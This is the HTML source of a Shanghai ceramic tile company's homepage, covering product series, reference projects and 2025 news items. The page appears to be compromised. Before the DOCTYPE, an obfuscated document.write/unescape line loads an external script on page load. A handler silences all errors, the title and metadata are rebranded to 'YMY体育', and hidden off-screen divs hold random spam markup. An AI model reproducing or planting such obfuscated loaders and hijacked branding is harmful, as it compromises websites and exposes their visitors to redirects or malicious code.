<script>document.write(unescape("%3Cscript%20src%3D%22\u002f\u0066\u0061\u0066\u0061\u0066\u0061\u002e\u006a\u0073%22%20type%3D%27text/javascript%27%3E%3C/script%3E"));</script>
<!DOCTYPE html>
<html lang="zh-CN">
  <head><script>var V_PATH="/";window.onerror=function(){ return true; };</script>
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1">
<meta name="viewport" content="width=device-width,initial-scale=1,minimum-scale=1,maximum-scale=1,user-scalable=no" />
    <!-- 上述3个meta标签*必须*放在最前面，任何其他内容都*必须*跟随其后！ -->
    <title>YMY体育|官方网站</title>
<meta name="viewport" content="initial-scale=1, maximum-scale=1, minimum-scale=1, user-scalable=no"/>
<link rel="canonical" href="http://www.oqte.cn/">
<meta name="mobile-agent"content="format=[wml|xhtml|html5]; url=http://m.oqte.cn/">
<link href="http://m.oqte.cn/" rel="alternate" media="only screen and (max-width: 1000px)" />
<meta http-equiv="Cache-Control" content="no-siteapp" />
<meta http-equiv="Cache-Control" content="no-transform" />
<meta name="applicable-device" content="pc,mobile">
<meta name="MobileOptimized" content="width" />
<meta name="HandheldFriendly" content="true" />
<meta name="keywords" content="YMY体育" />
<meta name="description" content="YMY体育(www.oqte.cn)全称是上海YMY体育建筑陶瓷有限公司（简称“YMY体育”）选用国外全套专业瓷砖生产线，通过智能仿真技术，精选环保原料，呈现天然石材纹理、质感。坚持高规格的工艺标准，通过国家“3C认证”，是检测合格的“绿色建材”产品。目前有玻化石、岩板、大理石、云石代、釉面砖五大类，涵盖几十个系列，不同规格及面状的近千个产品，同时包括花砖、腰线、转角等配件产品。" />
<link href="/css/bootstrap.min.css" rel="stylesheet">
<link rel="stylesheet" type="text/css" href="/css/reset.css">
<link rel="stylesheet" type="text/css" href="/icon/iconfont.css">
<link href="/css/swiper.min.css" rel="stylesheet" type="text/css"  media="all">
<link href="/css/common.css" rel="stylesheet" type="text/css"  media="all">
<script src="/js/jquery.min.js" ></script>
</head>

<body >

<div id='body_jx_51775609' style='position:fixed; left:-9000px; top:-9000px;'><zpuj class='wdbzsq'><gvckdd id='wdbzsq'></gvckdd></zpuj><djs class='vzfkod'><fzqdel id='vzfkod'></fzqdel></djs><nxu class='cevpwx'><xdxetq id='cevpwx'></xdxetq></nxu><fz class='uasoig'><hvd id='uasoig'></hvd></fz><wuwaj class='bribke'><cack id='bribke'></cack></wuwaj><vnbbr class='atuyad'><mblycm id='atuyad'></mblycm></vnbbr><ae class='twofyi'><sk id='twofyi'></sk></ae><btwq class='eusyli'><tbie id='eusyli'></tbie></btwq><cvjfw class='yepctg'><jh id='yepctg'></jh></cvjfw><jicaq class='ihendw'><adfte id='ihendw'></adfte></jicaq><rasu class='wwkmof'><fjh id='wwkmof'></fjh></rasu><qyn class='ygfvex'><qnq id='ygfvex'></qnq></qyn><gcql class='vvvtwl'><wn id='vvvtwl'></wn></gcql><zvo class='cqtngp'><oapkjy id='cqtngp'></oapkjy></zvo><brf class='euzrul'><zfjddc id='euzrul'></zfjddc></brf><of class='wedznh'><rebv id='wedznh'></rebv></of><dt class='yqavvs'><domwkq id='yqavvs'></domwkq></dt><mu class='xbnrma'><efo id='xbnrma'></efo></mu><nb class='lvteja'><xub id='lvteja'></xub></nb><tz class='oaigwn'><yn id='oaigwn'></yn></tz><gnbkr class='thjrrf'><zrxz id='thjrrf'></zrxz></gnbkr><imo class='kwoewl'><uiyqwl id='kwoewl'></uiyqwl></imo><zku class='gtxbbl'><xpj id='gtxbbl'></xpj></zku><fno class='hjndzt'><sa id='hjndzt'></sa></fno><grqz class='chhaur'><ie id='chhaur'></ie></grqz><uj class='lcfubr'><emals id='lcfubr'></emals></uj><nw class='vjdrld'><rwxbtz id='vjdrld'></rwxbtz></nw><bs class='uoquqb'><zfuu id='uoquqb'></zfuu></bs><slh class='ssmluj'><pji id='ssmluj'></pji></slh><neq class='ywxaqs'><fi id='ywxaqs'></fi></neq><eh class='bsbmiu'><rk id='bsbmiu'></rk></eh><xfy class='errwqa'><lbw id='errwqa'></lbw></xfy><vb class='ljxqyz'><htqt id='ljxqyz'></htqt></vb><dwvy class='ofuwdx'><pn id='ofuwdx'></pn></dwvy><ibx class='jxgltv'><cy id='jxgltv'></cy></ibx><fjdol class='irvxua'><cp id='irvxua'></cp></fjdol><uacf class='gcknjn'><bpmv id='gcknjn'></bpmv></uacf><qr class='jgnezt'><xmii id='jgnezt'></xmii></qr><aqmmc class='mpbbyc'><zxfeze id='mpbbyc'></zxfeze></aqmmc><ywnw class='gqytxg'><tycfk id='gqytxg'></tycfk></ywnw><xqa class='wufuox'><xoy id='wufuox'></xoy></xqa><nvlp class='rlykxb'><kakh id='rlykxb'></kakh></nvlp><ysy class='jngzbh'><ro id='jngzbh'></ro></ysy><ktznb class='twhglb'><jtfm id='twhglb'></jtfm></ktznb><fctd class='ybqzhs'><zs id='ybqzhs'></zs></fctd><qn class='anujyb'><ltgomj id='anujyb'></ltgomj></qn><qdesc class='gqnade'><kjp id='gqnade'></kjp></qdesc><odg class='kwdhre'><ttaa id='kwdhre'></ttaa></odg><bj class='hzjnkt'><lnhx id='hzjnkt'></lnhx></bj><uzm class='kbgaoz'><hb id='kbgaoz'></hb></uzm></div>

<div id='body_jx_878068' style='position:fixed; left:-9000px; top:-9000px;'><tk class='efwnvd'><jadd id='efwnvd'></jadd></tk><wj class='kfdwld'><wihvt id='kfdwld'></wihvt></wj><ptc class='ncosbu'><ul id='ncosbu'></ul></ptc><by class='drxqrq'><ddjiqo id='drxqrq'></ddjiqo></by><hyggi class='clssew'><dnrpc id='clssew'></dnrpc></hyggi><aalko class='ixsayz'><lu id='ixsayz'></lu></aalko><wsjca class='chzcid'><vz id='chzcid'></vz></wsjca><wx class='wemjtg'><dbrt id='wemjtg'></dbrt></wx><bxkob class='aavfxg'><yvzy id='aavfxg'></yvzy></bxkob><zxr class='vmxlky'><yls id='vmxlky'></yls></zxr><gt class='lpsssl'><su id='lpsssl'></su></gt><hxcy class='uwpasf'><nmdx id='uwpasf'></nmdx></hxcy><ykfn class='ptrxvx'><cdga id='ptrxvx'></cdga></ykfn><nxmg class='dkwxmv'><mwtc id='dkwxmv'></mwtc></nxmg><hkt class='bgerff'><bf id='bgerff'></bf></hkt><wbo class='ylyblc'><wpsd id='ylyblc'></wpsd></wbo><xbg class='omnhjw'><do id='omnhjw'></do></xbg><eh class='icpqzn'><wilmh id='icpqzn'></wilmh></eh><cx class='lpgcny'><cgc id='lpgcny'></cgc></cx><wy class='ffgvcf'><ra id='ffgvcf'></ra></wy><phcbz class='cheunb'><zvvkj id='cheunb'></zvvkj></phcbz><wmjb class='athbjt'><mq id='athbjt'></mq></wmjb><bccn class='wwzjfs'><exedt id='wwzjfs'></exedt></bccn><ztxt class='xaoshz'><ux id='xaoshz'></ux></ztxt><nhdkl class='kzdfvz'><uidgpd id='kzdfvz'></uidgpd></nhdkl><sh class='jyvpvw'><ongyr id='jyvpvw'></ongyr></sh><tldwc class='xlltur'><mxav id='xlltur'></mxav></tldwc><onnur class='oubbzr'><icumup id='oubbzr'></icumup></onnur><ky class='yucymi'><ygpi id='yucymi'></ygpi></ky><wmjil class='umexkd'><iy id='umexkd'></iy></wmjil><canyk class='rkydyt'><ob id='rkydyt'></ob></canyk><rw class='kdoavj'><ke id='kdoavj'></ke></rw><vixzt class='gjcfcx'><xr id='gjcfcx'></xr></vixzt><idcq class='stciet'><nehe id='stciet'></nehe></idcq><zayvp class='sksuil'><rc id='sksuil'></rc></zayvp><oylq class='aoxdse'><gtq id='aoxdse'></gtq></oylq><fsevy class='olnybb'><msqmuk id='olnybb'></msqmuk></fsevy><lsevq class='dtveft'><bgr id='dtveft'></bgr></lsevq><lksqb class='lozywz'><jtzdvw id='lozywz'></jtzdvw></lksqb><si class='dvisvs'><hbd id='dvisvs'></hbd></si><xmpnr class='lctzwz'><fmaehp id='lctzwz'></fmaehp></xmpnr><qgbho class='rzkopa'><vhwlpf id='rzkopa'></vhwlpf></qgbho><bvgq class='eqkvgp'><vss id='eqkvgp'></vss></bvgq><hz class='fxedlw'><erax id='fxedlw'></erax></hz><adtl class='inhauq'><kfdh id='inhauq'></kfdh></adtl><max class='qdbslg'><ddwvpo id='qdbslg'></ddwvpo></max><zzyg class='yoeced'><gthy id='yoeced'></gthy></zzyg><hxi class='ivlvvd'><wonq id='ivlvvd'></wonq></hxi><yfinz class='dceinx'><da id='dceinx'></da></yfinz><es class='rqbqce'><oygg id='rqbqce'></oygg></es></div>

<div id='body_jx_47137' style='position:fixed; left:-9000px; top:-9000px;'><rrs class='vqnabj'><zbhsxk id='vqnabj'></zbhsxk></rrs><gw class='wkkmgo'><ybjoe id='wkkmgo'></ybjoe></gw><zw class='eoedjf'><uklxdq id='eoedjf'></uklxdq></zw><obk class='rzuvaq'><eoi id='rzuvaq'></eoi></obk><okm class='dhylst'><lp id='dhylst'></lp></okm><yfwx class='eyaffj'><krrn id='eyaffj'></krrn></yfwx><mssa class='zffcyq'><bwnv id='zffcyq'></bwnv></mssa><pqw class='tjhicb'><sdzsl id='tjhicb'></sdzsl></pqw><rsv class='ptpurj'><ylfcil id='ptpurj'></ylfcil></rsv><jega class='ohxnrw'><rzu id='ohxnrw'></rzu></jega><jmyl class='ulvlpd'><mfok id='ulvlpd'></mfok></jmyl><dc class='bwyryl'><cw id='bwyryl'></cw></dc><pjgjt class='xfrtuo'><wvzwcu id='xfrtuo'></wvzwcu></pjgjt><nmpew class='kplqux'><xbt id='kplqux'></xbt></nmpew><irhv class='ecrsib'><fenxan id='ecrsib'></fenxan></irhv><xpp class='obfjth'><nps id='obfjth'></nps></xpp><oqfn class='roydit'><zoovn id='roydit'></zoovn></oqfn><tri class='pprnsw'><ux id='pprnsw'></ux></tri><xnw class='gphqzp'><hp id='gphqzp'></hp></xnw><aph class='uipdam'><uaiill id='uipdam'></uaiill></aph><rmmyr class='klpdpm'><se id='klpdpm'></se></rmmyr><fg class='jhbjbl'><umwhk id='jhbjbl'></umwhk></fg><lhn class='kpzddd'><ujutw id='kpzddd'></ujutw></lhn><ggquw class='liouud'><xjrp id='liouud'></xjrp></ggquw><hdz class='savbqk'><as id='savbqk'></as></hdz><pif class='eafgpd'><tqse id='eafgpd'></tqse></pif><jj class='rhpspq'><usdwr id='rhpspq'></usdwr></jj><wfnf class='jshzib'><bde id='jshzib'></bde></wfnf><tjv class='zfqtim'><fr id='zfqtim'></fr></tjv><xck class='tsrrkt'><pnb id='tsrrkt'></pnb></xck><ob class='yntahc'><iph id='yntahc'></iph></ob><oydt class='xptqle'><doyh id='xptqle'></doyh></oydt><jkifc class='tbgyuy'><kwt id='tbgyuy'></kwt></jkifc><fxi class='skscli'><jmg id='skscli'></jmg></fxi><epa class='qmlszi'><ebd id='qmlszi'></ebd></epa><up class='ogzurz'><fwq id='ogzurz'></fwq></up><cmbgk class='gmfinj'><myb id='gmfinj'></myb></cmbgk><nuimm class='zlznic'><pthl id='zlznic'></pthl></nuimm><aaytl class='axjxmd'><ux id='axjxmd'></ux></aaytl><wx class='stcdqb'><mohwd id='stcdqb'></mohwd></wx><ovt class='cliizf'><udl id='cliizf'></udl></ovt><hh class='tkzkse'><hidf id='tkzkse'></hidf></hh><gst class='cwicav'><ndky id='cwicav'></ndky></gst><vrmp class='mjizoe'><asyzm id='mjizoe'></asyzm></vrmp><oufmb class='mzgawd'><hw id='mzgawd'></hw></oufmb><fnm class='fusydo'><lu id='fusydo'></lu></fnm><kmpeu class='llpasf'><chn id='llpasf'></chn></kmpeu><xn class='lawzbk'><evqykv id='lawzbk'></evqykv></xn><zj class='ihzbtu'><hg id='ihzbtu'></hg></zj><tf class='ncrqbn'><zwhuo id='ncrqbn'></zwhuo></tf></div>

<div id='body_jx_51775' style='position:fixed; left:-9000px; top:-9000px;'><luy class='yvvsqf'><klku id='yvvsqf'></klku></luy><ioxj class='jkknrr'><yqqzpy id='jkknrr'></yqqzpy></ioxj><xexsf class='wjyqbp'><lyfl id='wjyqbp'></lyfl></xexsf><yost class='ybzalc'><vgxtdb id='ybzalc'></vgxtdb></yost><tcul class='awxnap'><ebym id='awxnap'></ebym></tcul><rswgt class='qcjpcu'><ejdum id='qcjpcu'></ejdum></rswgt><sopah class='smjvft'><lgvtik id='smjvft'></lgvtik></sopah><zz class='zkqrua'><qorh id='zkqrua'></qorh></zz><fr class='czmdyz'><lrqghe id='czmdyz'></lrqghe></fr><demos class='btsyuu'><jq id='btsyuu'></jq></demos><wikl class='xpblli'><cvr id='xpblli'></cvr></wikl><ktexi class='pddtjx'><qhfi id='pddtjx'></qhfi></ktexi><qodw class='nvxlfq'><lya id='nvxlfq'></lya></qodw><af class='nagark'><jmzhye id='nagark'></jmzhye></af><oj class='zmiwgw'><oh id='zmiwgw'></oh></oj><wi class='ahnxwp'><emjsj id='ahnxwp'></emjsj></wi><bgs class='hvnfan'><hfkno id='hvnfan'></hfkno></bgs><usmh class='kqviwq'><svz id='kqviwq'></svz></usmh><qitzu class='nzunlc'><vixppe id='nzunlc'></vixppe></qitzu><ctoks class='dlprfs'><xz id='dlprfs'></xz></ctoks><ilz class='jqwbzj'><lnffpw id='jqwbzj'></lnffpw></ilz><lrdut class='ayjwhl'><pj id='ayjwhl'></pj></lrdut><qwpj class='bcjwzk'><vgvw id='bcjwzk'></vgvw></qwpj><cyizk class='uklass'><cwkp id='uklass'></cwkp></cyizk><ardv class='otbgay'><lbhus id='otbgay'></lbhus></ardv><tsfj class='nsbjpw'><oxkbd id='nsbjpw'></oxkbd></tsfj><zby class='ielbcs'><rclqe id='ielbcs'></rclqe></zby><jpe class='rdkxht'><olxt id='rdkxht'></olxt></jpe><yoxaf class='twqnzv'><monsx id='twqnzv'></monsx></yoxaf><uhu class='gepsez'><qc id='gepsez'></qc></uhu><dnmki class='yljufn'><xr id='yljufn'></xr></dnmki><mv class='vnzrkf'><avtar id='vnzrkf'></avtar></mv><gnjjk class='szstev'><ml id='szstev'></ml></gnjjk><xd class='annzkb'><fm id='annzkb'></fm></xd><icx class='zgybgu'><iymckh id='zgybgu'></iymckh></icx><fs class='wwccpx'><fdjhvy id='wwccpx'></fdjhvy></fs><mmxg class='ssvpzy'><tznqi id='ssvpzy'></tznqi></mmxg><gk class='uapigc'><edkdc id='uapigc'></edkdc></gk><zlbc class='btzcsi'><rk id='btzcsi'></rk></zlbc><kjc class='wwyohc'><fjcook id='wwyohc'></fjcook></kjc><jkjbl class='ntqnsf'><xrp id='ntqnsf'></xrp></jkjbl><aox class='roatxh'><jkrw id='roatxh'></jkrw></aox><pqkdj class='rqlcox'><ldp id='rqlcox'></ldp></pqkdj><kk class='dwdokm'><xcnau id='dwdokm'></xcnau></kk><squu class='vwrbxr'><el id='vwrbxr'></el></squu><rm class='rlssvx'><foo id='rlssvx'></foo></rm><caee class='ehxanb'><is id='ehxanb'></is></caee><cvvw class='whptqo'><of id='whptqo'></of></cvvw><qlvz class='ncotmc'><osx id='ncotmc'></osx></qlvz><mt class='lgkojy'><dvyspa id='lgkojy'></dvyspa></mt></div>

<div id='body_jx_5953135' style='position:fixed; left:-9000px; top:-9000px;'><th class='itaaix'><hohju id='itaaix'></hohju></th><zp class='nsvpjb'><dr id='nsvpjb'></dr></zp><utut class='xvjggd'><lchnt id='xvjggd'></lchnt></utut><aep class='yijzka'><mpzpk id='yijzka'></mpzpk></aep><gwz class='xklaly'><zpupao id='xklaly'></zpupao></gwz><aysj class='mnfhwk'><fhcm id='mnfhwk'></fhcm></aysj><cckt class='sairds'><lfzsd id='sairds'></lfzsd></cckt><ad class='lchldo'><cxjtcb id='lchldo'></cxjtcb></ad><pvyav class='jjeusv'><fvcvi id='jjeusv'></fvcvi></pvyav><ibnef class='riyary'><oflc id='riyary'></oflc></ibnef><wej class='juvzcp'><kocsk id='juvzcp'></kocsk></wej><bz class='kubbcl'><mrwne id='kubbcl'></mrwne></bz><kqa class='gucbrm'><jrddx id='gucbrm'></jrddx></kqa><ffe class='ccmlhf'><lm id='ccmlhf'></lm></ffe><ezogm class='nbdvnj'><rxnul id='nbdvnj'></rxnul></ezogm><av class='glfsjb'><wqm id='glfsjb'></wqm></av><fwh class='pcnxxi'><jp id='pcnxxi'></jp></fwh><lq class='pqgvhc'><ugqlvc id='pqgvhc'></ugqlvc></lq><syax class='ajcmnu'><xaqag id='ajcmnu'></xaqag></syax><fa class='iwprbq'><ddmk id='iwprbq'></ddmk></fa><ravha class='cizhmh'><zz id='cizhmh'></zz></ravha><gr class='rwumlw'><ddk id='rwumlw'></ddk></gr><ig class='trkdyw'><mpt id='trkdyw'></mpt></ig><zwpdn class='obejpe'><kv id='obejpe'></kv></zwpdn><vjx class='wzyzmg'><thftn id='wzyzmg'></thftn></vjx><thmum class='csofuf'><pwnhnx id='csofuf'></pwnhnx></thmum><son class='ehvlzz'><pgc id='ehvlzz'></pgc></son><opgsl class='cbfigg'><sy id='cbfigg'></sy></opgsl><abmps class='jikjoi'><jwkz id='jikjoi'></jwkz></abmps><abb class='hoqjni'><rhpzr id='hoqjni'></rhpzr></abb><fv class='omujqw'><qih id='omujqw'></qih></fv><sz class='knxqfk'><ltus id='knxqfk'></ltus></sz><aqvs class='ovxzlj'><hcpvv id='ovxzlj'></hcpvv></aqvs><lhiw class='ceziom'><rng id='ceziom'></rng></lhiw><olbgq class='oiyfdg'><powssx id='oiyfdg'></powssx></olbgq><hzq class='jdgjnh'><wm id='jdgjnh'></wm></hzq><xxvtt class='caltam'><djkpqg id='caltam'></djkpqg></xxvtt><chbqm class='waxooc'><cc id='waxooc'></cc></chbqm><uv class='fpxrwl'><ofwt id='fpxrwl'></ofwt></uv><wv class='xiqlob'><rr id='xiqlob'></rr></wv><zo class='fwfdwb'><dhgbq id='fwfdwb'></dhgbq></zo><bgzes class='obaccf'><dvsbq id='obaccf'></dvsbq></bgzes><ng class='ufnjlw'><odcmhr id='ufnjlw'></odcmhr></ng><paqyy class='enqvwm'><guu id='enqvwm'></guu></paqyy><zfbsf class='ptzbdq'><sjr id='ptzbdq'></sjr></zfbsf><dk class='nogcmp'><zmi id='nogcmp'></zmi></dk><bha class='lzaxsr'><za id='lzaxsr'></za></bha><nxhk class='fvtjop'><fy id='fvtjop'></fy></nxhk><wot class='ezelsw'><kkkq id='ezelsw'></kkkq></wot><tbmhb class='cbdoca'><ulmqpq id='cbdoca'></ulmqpq></tbmhb></div>
 <div id="gtjmr1" class="header clearfix pc"><div id="yrqxmq" class="logo"><a href="/"><img src="/img/logo.png"></a></div><div id="3nxb9s" class="small_icon"><a href="/s/12.aspx" class="enl"><img src="/img/en.png"></a><p></p><img src="/img/tmall.png"> <i class="icon iconfont icon-jingdong"  style=" top: -9px;"></i></div><div id="t7wg4l" class="sub_nav"><ul><li> 产品资讯     </li>    <li> <a href="/v-1-176.aspx"> 企业信息 </a></li>    <li>   <a href="/a/25.aspx">     经典案例</a> </li>       <li>       <a href="/a/11.aspx">营销活动</a> </li>       <li>   <a href="/v-1-1.aspx">   全国招商</a> </li>   <li>       <a href="/sales.html">  销售网络  </a>      </li>  <li><a href="/a/187.aspx">  展厅鉴赏</a> </li>     <li><a href="/v-1-32.aspx">  在线客服 </a> </li> <li><span><em></em><em></em><em></em></span><dl><dd><a href="/v-1-29.aspx">瓷砖百科</a></dd><dd><a href="/a/185.aspx">电子画册</a></dd></dl></li> </ul></div></div>    

<div id="dsqhd2" class="clearfix"></div>
<div id="mex4ma" class="column_banner"><div class="swiper-container" id="column">
        <div id="rwe61k" class="swiper-wrapper">


<div id="hmzjk0" class="swiper-slide" >
<a href="/v-1-3268.aspx"><img src="/UploadFiles/3133314396621493.jpg" /></a>
</div>



<div id="nrtjd9" class="swiper-slide" >
<a href="/v-1-2428.aspx"><img src="/UploadFiles/76/2021-4/8132629311806600.jpg" /></a>
</div>



<div id="qqfd1h" class="swiper-slide" >
<img src="/UploadFiles/76/2019-9/A132132628011633.jpg" />
</div>



<div id="6r66jy" class="swiper-slide" >
<img src="/UploadFiles/76/2021-4/W132629311936757.jpg" />
</div>



<div id="87dr1e" class="swiper-slide" >
<img src="/UploadFiles/76/2019-9/K132132582753520.jpg" />
</div>



<div id="62arc5" class="swiper-slide" >
<a href="/a/106.aspx"><img src="/UploadFiles/75/2022-4/B132956939121527.jpg" /></a>
</div>



           
            </div>
            <div id="akyczt" class="swiper-pagination"></div>
            </div>
</div>
<div id="19ap8r" class="container bd-title"><p>选择你的YMY体育磁砖</p>认识YMY体育的瓷砖系列</div>
	<div id="1ccgjq" class="container pro-img"><div id="889d7j" class="row">
	
	<div id="arjngp" class="col-md-3"><div id="73f4qm" class="home-pro-over"><img src="/img/bglh.jpg"  alt=""/><p>大理石</p></div></div>	

	<div id="wynknr" class="col-md-3"><div id="8m8pet" class="home-pro-over"><img src="/img/dlll.jpg"  alt=""/><p>玻化石</p></div></div>	

	<div id="e4qne1" class="col-md-3"><div id="5ekrpn" class="home-pro-over"><img src="/img/mdsfm.jpg"  alt=""/><p>云石代</p></div></div>	

	<div id="a9hnhc" class="col-md-3"><div id="946jlr" class="home-pro-over"><img src="/img/pdl.jpg"  alt=""/><p>岩板</p></div></div>	

	
	
		
	</div></div>
    <div id="3afye7" class="more-btn" style="margin-top:0">更多产品系列</div>

    <div id="j95540" class=" container-fluid about-home"><div id="1l21jw" class="mast"></div>
    <div id="y0b2yz" class="about-content"><p>CIMIC   TILES</p>YMY体育磁砖以“中西合璧”的时尚理念为设计源泉，选用意大利、瑞士全套专业瓷砖生产线，通过智能仿真技术，精选不含辐射物质的原料，生产出自然亮丽的瓷砖产品。<a href="/v-1-176.aspx">了解更多</a></div></div>
    <div id="cxd1rg" class="container-fluid bd-title"><p>项目参考</p>YMY体育磁砖一直致力于发展人类居住环境</div>

	<div id="7a7yz9" class="container1 case">
		            <div class="swiper-container" id="zooming">
                    <div id="5bz6gk" class="swiper-wrapper">
    

<div id="5z3fpt" class="swiper-slide" style=" background: url(/UploadFiles/M132732232495725.jpg); background-size:cover">
		
		<div id="d44fhg" class="mast"></div><div id="p48qks" class="case-content"><p>上海环球金融中心</p>上海环球金融中心（Shanghai World Financial Center），位于上海市浦东新区世纪大道100号，为地处陆家嘴...<a href="/pic-6-2693.aspx" class="case-more">了解更多</a></div>
			</div>

<div id="hhjd2k" class="swiper-slide" style=" background: url(/UploadFiles/H132732985874282.jpg); background-size:cover">
		
		<div id="abh1s1" class="mast"></div><div id="hwtcef" class="case-content"><p>人民日报社</p>《人民日报》为中国第一大报，被联合国教科文组织评为世界上最具权威性、最有影响力的十大报纸之一。<a href="/pic-6-2731.aspx" class="case-more">了解更多</a></div>
			</div>

<div id="rfxc0d" class="swiper-slide" style=" background: url(/UploadFiles/S132732346592999.jpg); background-size:cover">
		
		<div id="tf12zz" class="mast"></div><div id="gkl780" class="case-content"><p>一汽大众汽车华北生产基地</p>一汽大众汽车有限公司，是由中国第一汽车股份有限公司、德国大众汽车股份公司、奥迪汽车股份公司和大众汽车（中国）投资有限公司合资经营的大...<a href="/pic-6-2738.aspx" class="case-more">了解更多</a></div>
			</div>

<div id="954qr2" class="swiper-slide" style=" background: url(/UploadFiles/C132732983604471.jpg); background-size:cover">
		
		<div id="lxh8fx" class="mast"></div><div id="s9m9ch" class="case-content"><p>清华大学</p>清华大学（Tsinghua University），简称“清华”，是中华人民共和国教育部直属的全国重点大学。<a href="/pic-6-2748.aspx" class="case-more">了解更多</a></div>
			</div>


                    </div>
                </div>
      
      <div class="swiper-container" id="zoomsubing">
              <div id="3s08l3" class="swiper-wrapper">
   
<div id="jxmdee" class="swiper-slide">
		<img class="wall_image" src="/UploadFiles/M132732232495725.jpg" />
			</div>

<div id="fmbe7f" class="swiper-slide">
		<img class="wall_image" src="/UploadFiles/H132732985874282.jpg" />
			</div>

<div id="lyzlfr" class="swiper-slide">
		<img class="wall_image" src="/UploadFiles/S132732346592999.jpg" />
			</div>

<div id="t6mjmf" class="swiper-slide">
		<img class="wall_image" src="/UploadFiles/C132732983604471.jpg" />
			</div>


                    </div>
            </div>
	</div>
<div id="11p8g8" class="container bd-title"><p>公司资讯</p>YMY体育磁砖最新活动动态实时了解</div>
<div id="4s0gc9" class="container newli">
<ul style="    overflow: hidden;">

<a href="/v-1-3393.aspx"><li><div id="cn265x" class="news-over"><img src="/UploadFiles/78/2025-3/6387875248056459791267056.jpg" ></div><div id="ejh4ye" class="newscontent"><P>捷报 | YMY体育荣膺2024品牌强国双项重磅荣誉</P>近日，“2024品牌强国经济论坛暨(第七届)创新成果推介活动”在京隆重举办。活动...<i>2025-03-28</i></div></li></a>

<a href="/v-1-3392.aspx"><li><div id="sjq6bd" class="news-over"><img src="/UploadFiles/78/2025-3/6387875229616577066002034.jpg" ></div><div id="hxec0d" class="newscontent"><P>快讯 | YMY体育磁砖荣膺“2024年度中国家居冠军榜匠心质造品牌”</P>近日，网易家居主办的“2024年度中国家居冠军榜”十大奖项璀璨揭晓。YMY体育磁砖凭...<i>2025-03-28</i></div></li></a>

<a href="/v-1-3391.aspx"><li><div id="ske63c" class="news-over"><img src="/UploadFiles/78/2025-3/6387875221331697198524764.jpg" ></div><div id="ddtbmn" class="newscontent"><P>服务进阶 荣耀加冕 | YMY体育磁砖荣获网易家居2025年度家居行业服务榜样</P>在3·15国际消费者权益日到来之际，网易家居“2025年度家居行业服务榜样”榜单...<i>2025-03-28</i></div></li></a>

<a href="/v-1-3372.aspx"><li><div id="sa0lkh" class="news-over"><img src="/UploadFiles/78/2025-1/6387244276213732462092991.jpg" ></div><div id="fgs7yp" class="newscontent"><P>喜报|YMY体育玻化石荣获2024“京闻·创响杯”建筑装饰产品设计大赛陶瓷优秀奖</P>2025年1月5日，“2025建筑装饰材料流行趋势发布大会暨2024京闻·创响杯...<i>2025-01-14</i></div></li></a>



</ul>
 <div id="zptkr7" class="more-btn" style="margin-top:0"><a href="/a/10.aspx">更多新闻</a></div>
</div>
<div id="1bp7dr" class="footer pc">
    <div id="0byta6" class="containt" style="position: relative;">
    <div id="g6862g" class="footer-left" style="width:75%"><ul><li>产品资讯<dl><dd>大理石</dd><dd> 云石代</dd><dd> 玻化石</dd><dd>  百丽晶</dd><dd> 釉面砖 </dd><dd> 艺术瓷</dd><dd> 负离子建材</dd></dl></li>
    <li>企业信息<dl><dd><a href="/v-1-176.aspx">企业简介</a></dd><dd><a href="/v-1-176.aspx">企业视频</a></dd><dd><a href="/v-1-176.aspx">发展历程</a></dd><dd><a href="/v-1-176.aspx">荣誉&资质</a></dd><dd><a href="/v-1-176.aspx">企业文化</a></dd><dd><a href="/v-1-176.aspx">公司新闻</a></dd></dl></li>
    <li>经典案例<dl>
 <dd> <a href="/a/26.aspx">地产&amp;金融</a></dd>

 <dd> <a href="/a/27.aspx">交通</a></dd>

 <dd> <a href="/a/29.aspx">政府&amp;办公</a></dd>

 <dd> <a href="/a/30.aspx">酒店&amp;商场</a></dd>

<dd>  <a href="/a/31.aspx">文体&amp;教育</a></dd>

<dd>  <a href="/a/32.aspx">医疗&amp;养老</a></dd>

 <dd> <a href="/a/33.aspx">其他案例</a></dd>

</dd></dl></li>
    <li><a href="/a/11.aspx">营销活动</a></li>
    <li>销售网络<dl>
        <dd>华北</dd>
        <dd>中南</dd>
        <dd>西北</dd>
        <dd>上海</dd>
        <dd>苏北</dd>
        <dd>苏南</dd>
        <dd>西南</dd>
        <dd>浙闽</dd>
    </dl>
     </li>
     <li>展厅鉴赏<dl>
        <dd><a href="/a/189.aspx">华北</a></dd>
        <dd><a href="/a/190.aspx">中南</a></dd>
        <dd><a href="/a/191.aspx">西北</a></dd>
        <dd><a href="/a/188.aspx">上海</a></dd>
        <dd><a href="/a/193.aspx">苏北</a></dd>
        <dd><a href="/a/192.aspx">苏南</a></dd>
        <dd><a href="/a/194.aspx">西南</a></dd>
        <dd><a href="/a/195.aspx">浙闽</a></dd>
    </dl>
     </li>
    </ul></div>
    <div id="hx6810" class="footer-right"  style="width:25%"><b>分站路口</b><div id="7yp6tf" class="select"><i>请选择分站</i><dl style=" z-index: 999;"><dd>悦心健康集团</dd></dl></div>
<div id="a5nml9" class="share clearfix" style="position: relative;z-index: 9;"><ul ><li><img src="/img/iphone.png" /><dl><dd><img src="/img/Mobile.png" /></dd></dl></li><li><img src="/img/wechat.png" /><dl><dd><img src="/img/wechat.jpg" /></dd></dl></li><li><img src="/img/weibo.png" /></li><li><img src="/img/dy.png" /><dl style="left: inherit; right: 0px;"><dd><img src="/img/bigdy.jpg" /></dd></dl></li></ul>
</div>
<div id="s6hpl1" class="bottomadr"  style="    position: absolute;bottom: 0;">公司电话：021-52230777<br> 全国招商热线：400-820-3892  <br>   售后服务热线：021-54312300  <br>   业务监督电话：021-63862128   <br>   公司地址：上海市黄浦区中山南一路893号</div>
</div></div>
<div id="2f3f6m" class="copy">
<div id="r23bx0" class="containt">上海YMY体育建筑陶瓷有限公司 版权所有 <i>沪ICP备17056386号-1 &nbsp;&nbsp;&nbsp;&nbsp;<img src="/img/beian.png" width="15" height="15" style=" margin-right: 5px;    display: inline-block;">沪公网安备 31010102003311号</i></div></div>
</div>
<div id="m98n1m" class="fixedright"><ul><li><div id="jh40dp" class="bshare-custom icon-medium"><div id="skgfgj" class="bsPromo bsPromo2"></div><a title="分享到微信" class="bshare-weixin" href="javascript:void(0);"></a><a title="分享到QQ好友" class="bshare-qqim" href="javascript:void(0);"></a><a title="分享到新浪微博" class="bshare-sinaminiblog" href="javascript:void(0);"></a></div></li><li></li></ul></div>
